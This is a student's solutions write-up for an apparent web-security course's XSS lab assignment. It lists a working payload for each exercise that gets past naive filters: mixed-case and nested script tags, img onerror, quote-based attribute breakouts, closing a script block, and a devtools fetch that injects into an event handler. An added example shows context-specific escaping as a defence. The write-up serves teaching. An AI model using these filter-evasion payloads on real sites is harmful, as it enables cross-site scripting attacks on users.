---
title: Assignment 1 Solutions
tags: cs253
---
You may need these:
- [XSS Filter Evasion Cheat Sheet](https://owasp.org/www-community/xss-filter-evasion-cheatsheet)
- :warning: [Assignment write-up by a mainland Chinese student](https://blog.csdn.net/qq_41170946/article/details/105410428) :warning:
## XSS INTO HTML TAGS
**Exercise 1 – A Truly Disruptive Startup**
```html
<script>success()</script>
```
**Exercise 2 – No Script Allowed**
- hint: [XSS: Beating HTML Sanitizing Filters](https://portswigger.net/support/xss-beating-html-sanitizing-filters)
```html
<scrscriptipt>success()</script>
```
**Exercise 3 – One More Time, Like You Mean It**
- Same hint as the previous exercise
- Even with greedy matching it only sanitizes `</script>`; it still cannot stop script inside script
```html
<scr ipt>success()</scr ipt>
```
**Exercise 4 – An Open-and-Shut Case**
- They forgot to ignore case; change the case and break through
```html
<SCRIPT>success()</SCRIPT>
```
**Exercise 5 – Time to Mix Things Up**
- Only the all-uppercase case is blocked, so change just one letter
```html
<sCript>success()</sCript>
```
**Exercise 6 – A Picture is Worth a Thousand Words**
- Look for a different method that does not use `<script>`
- See the [xss-filter-evasion-cheatsheet](https://owasp.org/www-community/xss-filter-evasion-cheatsheet)
- Attributes such as onerror, onload and onmouseover can be combined with other tags
- Try onerror, which fires when the img fails to load
```html
<IMG SRC=/ onerror="success()"></img>
```
**Exercise 7 – Between a Rock And a Hard Place**
- `q = q.replace(/script|onerror=|onload=/gi, '')`
- Looks like it only blocks onerror and onload
```html
<a onmouseover="success()"/>
```
**Exercise 8 – Angle of Death**
- Looks like it only sanitizes the angle brackets, and only once! Double them up and break through with onerror
```html
<<IMG SRC=/ onerror="success()"</img>
```
**Exercise 9 – All in a Day's Work**
- One finishing move that wraps up the **HTML TAGS** attacks
```javascript
function htmlElementEscape (str) {
  return str
    // This is not for security, but because '&' is the HTML escape character
    // and we don't want the user's input to be treated as an escape sequence.
    .replace(/&/g, '&amp;')
    // Without the '<' character, no HTML tags can be created.
    .replace(/</g, '&lt;')
}
```
## XSS INTO HTML ATTRIBUTES
> Found that the opponent shipped a new feature that drops user input straight into an attribute, unmodified.
>
> Looks like there is room for mischief :ghost:
**Exercise 10 – In the Wrong Place at the Wrong Time**
- A leading `"` is enough to break out
- `<SCRIPT>success()</SCRIPT>` does not work
- The reason is that our payload lands inside an HTML attribute, not inside an element
- So think in terms of attribute injection instead
***works***
```html
" onerror="success()"
```
```html
"<img src=/ onerror="success()" />
```
***failed***
```html
<SCRIPT>success()</SCRIPT>
```
**Exercise 11 – You Can't Win 'em All**
- The filter only replaces the first occurrence; hand it two quotes and the attack goes through
```html
"" onerror="success()"
```
```html
"" onload="success()"
```
**Exercise 12 – When All is Said and Done**
- Now that the double-quote escape has been countered, try an attack that uses no double quotes
- [`onload()`](https://www.w3schools.com/jsref/event_onload.asp) seems to be the more universally applicable handler
***works***
```html
' onload=success()
```
```html
' onload='success()'
```
***failed***
```html
' onerror=success()
```
**Exercise 13 – When You Want a Job Done Right**
- Peeked at how the escaping function is written and how it is used; user data is now escaped correctly
- Nothing left to try; time to concede
```javascript
function htmlAttributeEscape (str) {
  return str
    // This is not for security, but because '&' is the HTML escape character
    // and we don't want the user's input to be treated as an escape sequence.
    .replace(/&/g, '&amp;')
    // Without the single quote character, the attacker cannot escape from
    // inside a single-quoted HTML attribute.
    .replace(/'/g, '&#39;')
    // Without the double quote character, the attacker cannot escape from
    // inside a double-quoted HTML attribute.
    .replace(/"/g, '&quot;')
}
```
**Exercise 14 – Here Today and Gone Tomorrow**
- Mess with the URL and see what happens when you feed it a garbage language code
- View the page source
- Looks exploitable; try injecting an onload directly
- Great! It worked
**Answer**: `http://caloogle.xyz:4140/search?q=jgdjsetje&lang=en%20onload=success()`
## XSS INTO `<SCRIPT>` TAGS
**Exercise 15 – The Early Bird Catches the Worm**
- Type garbage into the search input and look for any user input that lands somewhere dangerous
- Found `q='asgwsrw'` near the bottom that can be exploited, so just give its `<script>` a closing tag
**works**
```html
</script> <img src=/ onerror=success() /> <script>
```
```html
</script> <body onload=success() /> <script>
```
**Exercise 16 – Tying Up Loose Ends**
- It tries to strip the `</` sequence with a regex, so I nest `</` inside another `</` to form `<<//` and see what happens
**works**
```html
<<//script> <body onload=success() /> <script>
```
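Added example, not part of this write-up or the assignment's own code: the escape functions from Exercises 9 and 13 beside an encoder for the `<script>`-literal context of Exercises 15 and 16, checked against the page's own payloads to show that each encoder only holds in the context it was written for. `scriptLiteralEscape`, `breakChars` and `breaksOut` are names chosen here; the contexts are constructed.

```javascript
// Added example, not the assignment's own code: the two escape functions from
// Exercises 9 and 13, an encoder for the <script>-literal context of
// Exercises 15 and 16, and a check of which encoder holds in which context.
// The payloads below are quoted from the exercises; the contexts are constructed.

function htmlElementEscape (str) {
  return str.replace(/&/g, '&amp;').replace(/</g, '&lt;')
}

function htmlAttributeEscape (str) {
  return str.replace(/&/g, '&amp;').replace(/'/g, '&#39;').replace(/"/g, '&quot;')
}

// A value embedded in a <script> block as a JS literal (the q='...' case).
// JSON.stringify neutralises quotes and backslashes; '<' is then encoded so
// the closing sequence "</script>" can never be formed, however it is split.
function scriptLiteralEscape (value) {
  return JSON.stringify(value).replace(/</g, '\\u003c')
}

// Characters that, if they survive encoding, let a value escape its context.
const breakChars = {
  element:       /</,            // <p>VALUE</p>
  quotedAttr:    /"/,            // <html lang="VALUE">
  unquotedAttr:  /[\s"'=<>`]/,   // <html lang=VALUE>  (Exercise 14)
  scriptLiteral: /<\/script/i    // <script>var q = VALUE</script>
}

// true when `encoder` fails to keep `input` inside `contextName`.
function breaksOut (contextName, encoder, input) {
  return breakChars[contextName].test(encoder(input))
}

const cases = [
  ['element',       htmlElementEscape,   '<IMG SRC=/ onerror="success()"></img>'],
  ['quotedAttr',    htmlElementEscape,   '" onerror="success()"'],   // wrong encoder for the context
  ['quotedAttr',    htmlAttributeEscape, '" onerror="success()"'],
  ['unquotedAttr',  htmlAttributeEscape, 'en onload=success()'],     // nothing to escape: no quotes
  ['scriptLiteral', htmlAttributeEscape, '</script> <img src=/ onerror=success() /> <script>'],
  ['scriptLiteral', scriptLiteralEscape, '</script> <img src=/ onerror=success() /> <script>']
]

for (const [ctx, enc, input] of cases) {
  console.log(`${ctx.padEnd(13)} ${enc.name.padEnd(19)} breaks out: ${breaksOut(ctx, enc, input)}`)
}
```

The unquoted-attribute row is Exercise 14 in miniature: quote-escaping cannot help a value that the template never quoted, so the fix is to quote the attribute and then escape.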
## XSS INTO EVENT HANDLER
**Exercise 17 – Take a Page Out of Their Book**
- What sits inside [`onmouse`](https://www.w3schools.com/jsref/event_onmouseover.asp) is script, so close the current statement yourself with a semicolon and append the script you want
Go to the F12 devtools and run:
```javascript
window.fetch('/comment', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json'
  },
  body: JSON.stringify({text: 'http://google.com', id: "1);success("})
}).then((resp) => resp.json())
  .then(data => { console.log(data) })
```
## CONGRATS
**Exercise 18 – A Penny For Your Thoughts**